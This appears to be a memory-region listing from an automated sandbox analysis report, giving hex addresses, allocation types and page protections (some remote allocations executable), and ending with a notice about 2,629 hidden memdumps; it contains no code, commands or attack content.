page read and write
1A2C41A1000
heap
page read and write
29E19D18000
heap
page read and write
40B80000
trusted library allocation
page read and write
2410000
direct allocation
page read and write
7DE000
heap
page read and write
21C33890000
heap
page read and write
41470000
trusted library allocation
page read and write
C2F31FE000
stack
page read and write
198000
stack
page read and write
1A2C41B1000
heap
page read and write
7FFAABBA0000
trusted library allocation
page read and write
25FC000
direct allocation
page read and write
D936DFE000
stack
page read and write
2B07A3E4000
heap
page read and write
3D88D000
trusted library allocation
page execute and read and write
41D60000
trusted library allocation
page read and write
3BE14000
heap
page read and write
1A2C49A0000
trusted library allocation
page read and write
6EC5D000
unkown
page read and write
40C30000
trusted library allocation
page read and write
7FFAABA01000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
4189E000
stack
page read and write
1A2C4960000
trusted library allocation
page read and write
3D88E000
stack
page read and write
13DDE000
stack
page read and write
19AC174B000
heap
page read and write
40BC0000
trusted library allocation
page read and write
296F0000
trusted library allocation
page read and write
1A2C48C9000
trusted library allocation
page read and write
314C2FE000
stack
page read and write
3BE4D000
heap
page read and write
40A80000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
3BE34000
heap
page read and write
40AB0000
trusted library allocation
page read and write
727000
heap
page read and write
28D60000
trusted library allocation
page read and write
C2F438E000
stack
page read and write
25F6F000
stack
page read and write
41D80000
trusted library allocation
page read and write
41550000
trusted library allocation
page read and write
7FFAAB86B000
trusted library allocation
page read and write
1A2C34C9000
heap
page read and write
7FFAABC50000
trusted library allocation
page read and write
41D90000
trusted library allocation
page read and write
41A30000
remote allocation
page read and write
41480000
trusted library allocation
page read and write
2B07A2B0000
trusted library allocation
page read and write
40A50000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
41283000
heap
page read and write
29C6E000
stack
page read and write
40BC0000
trusted library allocation
page read and write
314AF7E000
unkown
page readonly
1A2C41B1000
heap
page read and write
29E1C24C000
trusted library allocation
page read and write
19AC1716000
heap
page read and write
40A40000
trusted library allocation
page read and write
13EDF000
stack
page read and write
41D80000
trusted library allocation
page read and write
1A2C418F000
heap
page read and write
21C338BD000
heap
page read and write
1A2C437B000
heap
page read and write
7E9E0000
direct allocation
page read and write
25AF0000
trusted library allocation
page read and write
1A2C4392000
heap
page read and write
7FFAAB9F0000
trusted library allocation
page execute and read and write
2230000
heap
page read and write
1A2C438D000
heap
page read and write
296D0000
trusted library allocation
page read and write
296B9000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
13C64000
direct allocation
page read and write
1A2C41A1000
heap
page read and write
7FFAABBF0000
trusted library allocation
page read and write
1A2C48E0000
trusted library allocation
page read and write
314A77E000
unkown
page readonly
41440000
trusted library allocation
page read and write
2BA0000
heap
page read and write
2618000
direct allocation
page read and write
41440000
trusted library allocation
page read and write
7FFB05F52000
unkown
page readonly
3BD40000
heap
page read and write
3D8BB000
trusted library allocation
page execute and read and write
7FFAAB83D000
trusted library allocation
page execute and read and write
41440000
trusted library allocation
page read and write
414A0000
trusted library allocation
page read and write
7F4000
heap
page read and write
414C0000
trusted library allocation
page read and write
286C000
direct allocation
page read and write
7FFAABA12000
trusted library allocation
page read and write
1A2C4356000
heap
page read and write
28E80000
trusted library allocation
page read and write
40AF0000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
29EA0000
trusted library allocation
page read and write
1A2C435E000
heap
page read and write
2B07A290000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
41302000
heap
page read and write
3BE21000
heap
page read and write
19AC16F7000
heap
page read and write
7FFAABB60000
trusted library allocation
page read and write
1A2C4720000
heap
page read and write
41430000
trusted library allocation
page read and write
1A2C41BA000
heap
page read and write
2419000
direct allocation
page read and write
1A2C41AB000
heap
page read and write
21C39020000
remote allocation
page read and write
296C0000
trusted library allocation
page read and write
1405E000
stack
page read and write
29E326A0000
heap
page read and write
3D910000
trusted library allocation
page read and write
7FFAABA60000
trusted library allocation
page read and write
1471E000
stack
page read and write
1A2C41A1000
heap
page read and write
1A2C432C000
heap
page read and write
1A2C4356000
heap
page read and write
242BF000
stack
page read and write
41410000
trusted library allocation
page read and write
40300000
heap
page execute and read and write
4159E000
stack
page read and write
29FE0000
trusted library allocation
page read and write
3D950000
trusted library allocation
page read and write
40E2E000
stack
page read and write
2B00022A000
trusted library allocation
page read and write
23FDA000
heap
page read and write
540000
unkown
page execute and read and write
3DDD0000
heap
page execute and read and write
40BA0000
trusted library allocation
page read and write
410AE000
stack
page read and write
1A2C3638000
trusted library allocation
page read and write
41D60000
trusted library allocation
page read and write
41450000
trusted library allocation
page read and write
1444E000
stack
page read and write
7FCB0000
direct allocation
page read and write
41D60000
trusted library allocation
page read and write
41DA0000
trusted library allocation
page read and write
29E2A34F000
trusted library allocation
page read and write
40B70000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
1A2C9979000
trusted library allocation
page read and write
1A2C439E000
heap
page read and write
1A2C46E2000
heap
page read and write
1A2C41AB000
heap
page read and write
25FE7000
trusted library allocation
page read and write
1A2C4368000
heap
page read and write
29E32390000
heap
page read and write
1A2C34C6000
heap
page read and write
41D60000
trusted library allocation
page read and write
19AC1724000
heap
page read and write
1A2C419C000
heap
page read and write
25E6000
direct allocation
page read and write
3DBB0000
heap
page read and write
3BD7C000
heap
page read and write
41D60000
trusted library allocation
page read and write
1454F000
stack
page read and write
1A2C41AB000
heap
page read and write
29E323DE000
heap
page read and write
41440000
trusted library allocation
page read and write
4147F000
trusted library allocation
page read and write
29B4000
heap
page read and write
29E19C54000
heap
page read and write
2B07A0AA000
heap
page read and write
D936BFD000
stack
page read and write
577000
unkown
page readonly
41430000
trusted library allocation
page read and write
41470000
trusted library allocation
page read and write
40C10000
trusted library allocation
page read and write
13D5A000
stack
page read and write
41430000
trusted library allocation
page read and write
7FC40000
direct allocation
page read and write
41430000
trusted library allocation
page read and write
1A2C418F000
heap
page read and write
1A2C4333000
heap
page read and write
1A2C41A1000
heap
page read and write
7FFAAB950000
trusted library allocation
page execute and read and write
1A2C9974000
trusted library allocation
page read and write
29E1A54A000
trusted library allocation
page read and write
71E000
stack
page read and write
41450000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
41DB0000
trusted library allocation
page read and write
411FE000
stack
page read and write
142BF000
stack
page read and write
260A000
direct allocation
page read and write
71267FE000
stack
page read and write
7F0C0000
direct allocation
page read and write
3BECD000
trusted library allocation
page execute and read and write
1A2C41BB000
heap
page read and write
3D8E0000
trusted library allocation
page read and write
296F0000
trusted library allocation
page read and write
41470000
trusted library allocation
page read and write
21C336A0000
heap
page read and write
28EB0000
trusted library allocation
page read and write
41C40000
trusted library allocation
page read and write
1A2C438D000
heap
page read and write
7FFAABB20000
trusted library allocation
page read and write
2468000
direct allocation
page read and write
1A2C419A000
heap
page read and write
19AC1778000
heap
page read and write
7FFAABA70000
trusted library allocation
page read and write
29E1BF69000
trusted library allocation
page read and write
1A2C4377000
heap
page read and write
1A2C41B1000
heap
page read and write
297E0000
trusted library allocation
page read and write
2852E000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
1A2C3694000
trusted library allocation
page read and write
25B20000
heap
page read and write
630000
heap
page read and write
2633000
heap
page read and write
41B7F000
stack
page read and write
41460000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
7FFAABAA0000
trusted library allocation
page read and write
3BDDD000
heap
page read and write
41440000
trusted library allocation
page read and write
41441000
trusted library allocation
page read and write
4024E000
stack
page read and write
3D8B2000
trusted library allocation
page read and write
296FF000
trusted library allocation
page read and write
727000
heap
page read and write
1A2C438D000
heap
page read and write
41A30000
remote allocation
page read and write
419AF000
stack
page read and write
41D70000
trusted library allocation
page read and write
45DE000
stack
page read and write
8DF000
stack
page read and write
40BF0000
trusted library allocation
page read and write
25B03000
trusted library allocation
page execute and read and write
1A2C41A2000
heap
page read and write
41322000
heap
page read and write
4125B000
heap
page read and write
41470000
trusted library allocation
page read and write
21C38E41000
heap
page read and write
3D8D0000
trusted library allocation
page read and write
2603000
direct allocation
page read and write
41D70000
trusted library allocation
page read and write
29CB0000
trusted library allocation
page execute and read and write
40F6E000
stack
page read and write
24070000
heap
page read and write
1A2C9C00000
heap
page read and write
41440000
trusted library allocation
page read and write
21C38EC7000
heap
page read and write
148A8000
heap
page read and write
41400000
trusted library allocation
page read and write
1A2C46E5000
heap
page read and write
7FFAAB830000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
7FFAABB70000
trusted library allocation
page read and write
1A2C41A0000
heap
page read and write
29E1BE03000
trusted library allocation
page read and write
2B0011BC000
trusted library allocation
page read and write
1A2C98C2000
trusted library allocation
page read and write
3BD70000
heap
page read and write
411C0000
trusted library allocation
page read and write
1A2C46D1000
heap
page read and write
21C33895000
heap
page read and write
5DB000
heap
page read and write
1A2C419A000
heap
page read and write
3DDA0000
trusted library allocation
page read and write
3BE60000
heap
page read and write
41560000
trusted library allocation
page read and write
21C38E58000
heap
page read and write
40F6E000
stack
page read and write
40B20000
trusted library allocation
page read and write
28E85000
trusted library allocation
page read and write
411C0000
trusted library allocation
page read and write
7FFAAB9D0000
trusted library allocation
page read and write
411C0000
heap
page read and write
41560000
trusted library allocation
page read and write
21A8000
direct allocation
page read and write
21C38E8F000
heap
page read and write
285B000
direct allocation
page read and write
7FDF0000
trusted library allocation
page execute and read and write
13BED000
direct allocation
page read and write
296E0000
trusted library allocation
page read and write
14B24000
heap
page read and write
296C0000
trusted library allocation
page read and write
3D8B5000
trusted library allocation
page execute and read and write
540000
remote allocation
page execute and read and write
7126D4A000
stack
page read and write
21C38E2A000
heap
page read and write
78A000
heap
page read and write
2968D000
trusted library allocation
page read and write
41445000
trusted library allocation
page read and write
21B9000
direct allocation
page read and write
41440000
trusted library allocation
page read and write
40972000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
296E0000
trusted library allocation
page read and write
296E0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
7FFAABBE0000
trusted library allocation
page read and write
1A2C3631000
trusted library allocation
page read and write
28576000
trusted library allocation
page read and write
2B07A19A000
heap
page read and write
3D8A2000
trusted library allocation
page read and write
29E1CB78000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
29FF0000
trusted library allocation
page read and write
C2F420E000
stack
page read and write
7FFAAB860000
trusted library allocation
page read and write
1A2C41CC000
heap
page read and write
2412000
direct allocation
page read and write
402CB000
trusted library allocation
page read and write
29740000
trusted library allocation
page read and write
29A0000
heap
page read and write
7FFAABB90000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
25B10000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
40B00000
trusted library allocation
page read and write
41A30000
trusted library allocation
page execute and read and write
1A2C41A2000
heap
page read and write
41DA0000
trusted library allocation
page read and write
C2F3073000
stack
page read and write
1A2C41CF000
heap
page read and write
1A2C4155000
heap
page read and write
1A2C3620000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
314AD7E000
unkown
page readonly
41440000
trusted library allocation
page read and write
23FD0000
heap
page read and write
1A2C419A000
heap
page read and write
296F0000
trusted library allocation
page read and write
1A2C4346000
heap
page read and write
41C30000
trusted library allocation
page read and write
297F000
stack
page read and write
28EC0000
trusted library allocation
page read and write
7FFAAB85D000
trusted library allocation
page execute and read and write
426000
unkown
page execute and read and write
1A2C41AB000
heap
page read and write
1A2C41A2000
heap
page read and write
41460000
trusted library allocation
page read and write
8A0000
remote allocation
page execute and read and write
29CFE000
stack
page read and write
1481D000
stack
page read and write
29E19F70000
heap
page execute and read and write
1A2C41B1000
heap
page read and write
7FFAABC40000
trusted library allocation
page read and write
C2F35BA000
stack
page read and write
297E0000
trusted library allocation
page read and write
56E000
unkown
page read and write
416000
unkown
page readonly
3D883000
trusted library allocation
page execute and read and write
3BE5A000
heap
page read and write
1A2C98D5000
trusted library allocation
page read and write
7EB40000
direct allocation
page read and write
1A2C4366000
heap
page read and write
296D0000
trusted library allocation
page read and write
1440E000
stack
page read and write
40B8C000
stack
page read and write
198000
stack
page read and write
28E30000
trusted library allocation
page read and write
41470000
trusted library allocation
page read and write
2B07A0A0000
heap
page read and write
296E0000
trusted library allocation
page read and write
40986000
trusted library allocation
page read and write
3D890000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
4147F000
trusted library allocation
page read and write
4F0000
remote allocation
page execute and read and write
40BE0000
trusted library allocation
page read and write
1A2C34B9000
heap
page read and write
29EB0000
trusted library allocation
page read and write
40C40000
trusted library allocation
page read and write
2B07C119000
heap
page read and write
4124E000
heap
page read and write
2810E000
stack
page read and write
41440000
trusted library allocation
page read and write
19AC1757000
heap
page read and write
3DBF0000
heap
page execute and read and write
414B0000
trusted library allocation
page read and write
297E0000
trusted library allocation
page read and write
2B07A2D0000
trusted library allocation
page read and write
21C38DE0000
trusted library allocation
page read and write
5F5000
heap
page read and write
41440000
trusted library allocation
page read and write
297E0000
trusted library allocation
page read and write
243D000
direct allocation
page read and write
40B90000
trusted library allocation
page read and write
41450000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
1A2C41B1000
heap
page read and write
141BE000
stack
page read and write
3BE59000
heap
page read and write
2950A000
heap
page read and write
1A2C34CD000
heap
page read and write
3DBAC000
stack
page read and write
7FFAABAE0000
trusted library allocation
page read and write
1A2C419C000
heap
page read and write
40B60000
trusted library allocation
page read and write
3D893000
trusted library allocation
page read and write
19AC1850000
trusted library allocation
page read and write
25B90000
heap
page read and write
7AB000
heap
page read and write
1A2C4334000
heap
page read and write
There are 2629 hidden memdumps, click here to show them.